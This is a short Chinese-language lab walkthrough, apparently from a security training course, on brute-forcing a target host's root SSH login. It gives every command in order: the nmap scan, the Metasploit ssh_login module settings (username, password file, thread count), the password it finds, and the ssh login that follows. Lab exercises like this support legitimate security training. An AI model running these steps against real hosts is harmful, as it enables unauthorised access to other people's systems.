Metasploit對目標主機SSH爆破
實驗原理:
1) 靶機root用戶存在弱口令漏洞,利用枚舉的方法破解目標主機ssh服務。
實驗步驟:
一、利用nmap工具掃描目標主機
1.1 使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。
1.2 在終端中輸入命令“nmap –sV -O 192.168.1.3”,對目標主機進行端口掃描,發現開放22端口。
1.3 在終端中輸入命令“msfconsole”,啓動MSF終端
1.4 在終端中輸入命令“search ssh_login”,搜索ssh_login的相關工具和攻擊載荷。
1.5 在終端中輸入命令“use auxiliary/scanner/ssh/ssh_login”,啓用漏洞利用模塊, 提示符就會提示進入到該路徑下。
1.6 在終端中輸入命令“show options”,查看需要設置的相關項,“yes”表示必須填寫的參數。
1.7 在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。
1.8 在終端中輸入“set USERNAME root”,指定登陸用戶名root。
1.9 在終端中輸入“set PASS_FILE /home/passwd.txt”,設置暴利破解的密碼文件路徑。
1.10 在終端中輸入“set THREADS 50”,設置暴利破解的線程數爲50。
1.11 在終端中輸入“run”, 開始向目標主機爆破ssh的登陸帳號和密碼,登陸帳號爲root,密碼爲Simplexue123。
1.12 在終端中輸入“ssh [email protected]”,連接目標主機,然後查看網卡信息。